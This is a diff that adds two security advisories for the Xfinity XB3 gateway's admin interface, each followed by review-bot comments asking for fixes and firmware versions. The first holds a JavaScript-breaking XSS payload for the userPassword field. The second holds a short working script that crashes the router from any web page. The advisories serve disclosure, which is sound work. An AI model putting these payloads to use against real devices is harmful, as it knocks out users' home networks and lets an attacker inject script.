Showing 2 changed files with 34 additions and 0 deletions.
@@ -0,0 +1,17 @@ | ||
# Xfinity Gateway XB3 - Authenticated Reflected XSS | ||
The administrative interface of Xfinity Gateway model XB3 (and possibly others) will execute arbitrary JavaScript if sent a specially crafted POST request by an a logged in administrator. | ||
|
||
## Details | ||
The `/wizard_step2.php` page takes a POST parameter `userPassword` and unsafely echoes it to JavaScript on the page: | ||
|
||
var newPassword = '<?php if("admin" == $_SESSION["loginuser"]) echo $_POST["userPassword"]; ?>'; | ||
|
||
Arbitrary JavaScript can be executed if the following payload is sent in the `userPassword` POST parameter: | ||
|
||
';}alert(1);function foo() {var foo = ' | ||
|
||
## Mitigating Factors | ||
Users can be logged into the XB3 gateway by any website if the device is using default credentials. However, the POST request exploiting this vulnerability requires a valid CSRF protection token, so this vulnerability is not exploitable by malicious websites without an accompanying CSRF protection token leak. | ||
|
||
## Impact | ||
5.3 - Medium (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:H/A:L) |
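Review bot: the Details section identifies the sink (`echo $_POST["userPassword"]` inside a single-quoted JavaScript string literal, gated only on `$_SESSION["loginuser"]` being `admin`) but the file never says what the fix is; add a short remediation line, e.g. emit the value with `json_encode()` so quotes and braces cannot terminate the literal, or drop the reflection entirely, since a submitted password has no reason to be echoed back into page script. Also a typo in the opening paragraph: "by an a logged in administrator" should read "by a logged-in administrator".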
@@ -0,0 +1,17 @@ | ||
# Xfinity Gateway XB3 - DoS Via Large POST Request | ||
The administrative interface of Xfinity Gateway model XB3 (and possibly others) does not enforce a max POST request size. Any website is able to send a large POST request to the gateway at `10.0.0.1`. If the request size is large enough, the device will stop responding and reboot, leading to a Denial of Service condition due to memory exhaustion. | ||
|
||
## Proof of Concept | ||
The following JavaScript will crash an XB3 gateway if a website visitor stays on the page long enough: | ||
|
||
(() => { | ||
const xhr = new XMLHttpRequest(); | ||
xhr.open('POST', 'http://10.0.0.1'); | ||
xhr.send('A'.repeat(99999999)); | ||
})(); | ||
|
||
## Mitigating Factors | ||
During testing it took an average of 80 seconds to post enough data to cause this crash, so a website exploiting this bug would need to convince the user to wait around long enough to finish posting the payload. | ||
|
||
## Impact | ||
6.5 - Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) |
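Review bot: neither advisory states which firmware version was tested, so "model XB3 (and possibly others)" gives a reader no way to check whether their own device is affected; add a tested-version line under the title. The file also attributes the reboot to memory exhaustion but proposes no fix; a remediation sentence (reject a request whose `Content-Length` or streamed body exceeds a fixed limit before it is buffered, instead of reading the whole body into memory) would make the "does not enforce a max POST request size" finding actionable for the vendor.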